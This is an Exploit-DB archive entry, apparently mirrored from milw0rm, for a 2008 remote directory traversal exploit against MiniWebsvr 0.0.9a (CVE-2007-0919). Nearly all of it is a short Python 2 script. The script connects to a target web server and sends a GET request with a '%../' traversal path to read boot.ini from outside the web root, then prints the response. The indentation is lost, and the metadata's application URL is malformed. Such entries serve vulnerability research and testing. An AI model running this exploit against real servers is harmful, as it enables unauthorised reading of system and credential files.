MiniWebsvr 0.0.9a - Remote Directory Traversal
Author: gbr
type: remote
platform: windows
port:
date_added: 2008-03-02
date_updated: 2016-09-27
verified: 1
codes: OSVDB-50022;CVE-2007-0919
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comminiwebsvr_0.0.9_win32.zip
import socket
import sys
print '---------------------------------------------------------'
print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'
print 'Project URL: http://miniwebsvr.sourceforge.net/'
print 'Author: gbr'
print 'Tested on Windows XP SP2'
print '---------------------------------------------------------'
host = "127.0.0.1"
port = 8080
if sys.argv[1:]:
host = sys.argv[1]
if sys.argv[2:]:
port = int(sys.argv[2])
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")
while True:
data = s.recv(4096)
if not data:
break
print data
except:
print "Connection Error"
# milw0rm.com [2008-03-03]